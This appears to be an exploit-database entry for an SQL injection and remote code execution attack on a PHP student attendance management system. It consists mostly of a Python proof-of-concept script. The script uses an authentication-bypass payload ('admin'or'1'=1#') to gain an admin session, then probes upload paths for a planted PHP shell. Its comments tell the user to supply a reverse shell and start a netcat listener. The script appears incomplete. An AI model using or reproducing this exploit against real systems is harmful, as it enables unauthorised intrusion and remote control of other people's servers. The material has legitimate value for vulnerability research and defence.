Exploits / Vulnerability Discovered : 2020-11-04 |
Type : webapps |
Platform : php
This exploit / vulnerability Student attendance management system 1.0 username sql injection / remote code execution is for educational purposes only and if it is used you will do on your own risk!
# replace shell.php with your own php reverse shell
# change [TARGET URL] to target URL or IP address
# setup your netcat listener for sum good ol shellz
#!/usr/bin/python3
import requests
import time
def sqli_admin():
s = requests.Session()
data = {"username":"admin'or'1'=1#","password":"mosaaed"}
adminlogin = "http://localhost/sta/ajax.php?action=save_settings"
s.post(adminlogin,data=data)
return s
def get_shell(start,end,session):
for i in range(start,end):
session.get("http://localhost/sta/assets/uploads/"+str(i)+"_shell.php")
response = requests.get ("http://localhost/sta/assets/uploads/"+ str(i) +"_shell.php")
if response.status_code == 200:
print("http://localhost/sta/assets/uploads/"+str(i)+"_shell.php")